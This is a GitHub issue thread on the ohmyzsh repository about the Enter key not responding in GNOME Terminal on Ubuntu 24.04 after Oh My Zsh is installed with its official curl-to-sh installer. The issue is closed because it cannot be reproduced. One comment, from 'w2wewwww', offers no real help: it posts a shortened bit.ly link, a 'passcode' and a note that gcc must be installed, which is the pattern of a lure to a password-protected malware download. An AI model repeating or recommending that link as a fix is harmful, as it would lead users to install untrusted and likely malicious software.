### ISSUE TITLE
enter is invalid when I install omz in ubuntu

### ISSUE THREAD

**Issue by zey1996** [ohmyzsh/ohmyzsh#12655]
### Describe the bug

I use ubuntu 24.04 on my pc, and I install omz.

```
sudo apt install zsh
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```
Now, My enter button is not responding at all.
My keyboard is fine.
If I just use zsh without omz, it's fine.
I can use another pc, ssh to this pc. omz is working.

And I found my `page up`,`page down` is diffent from `bash`. I think it's maybe a keymap problem.
But how can I debug and fix it? 

### Steps to reproduce

do nothing. It is not available after installed.

### Expected behavior

available

### OS / Linux distribution

Ubuntu 24.04

### Zsh version

5.9

### Oh My Zsh version

master (80fa5e1)

### Terminal emulator

GNOME Terminal

### If using WSL on Windows, which version of WSL

None

### Additional context

everything is default

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by carlosala** [comment]
Hi! Is this still happening?

**Comment by zey1996** [comment]
In fact, I uninstall omz.

**Comment by carlosala** [comment]
No reproduction then 😢 
Closing
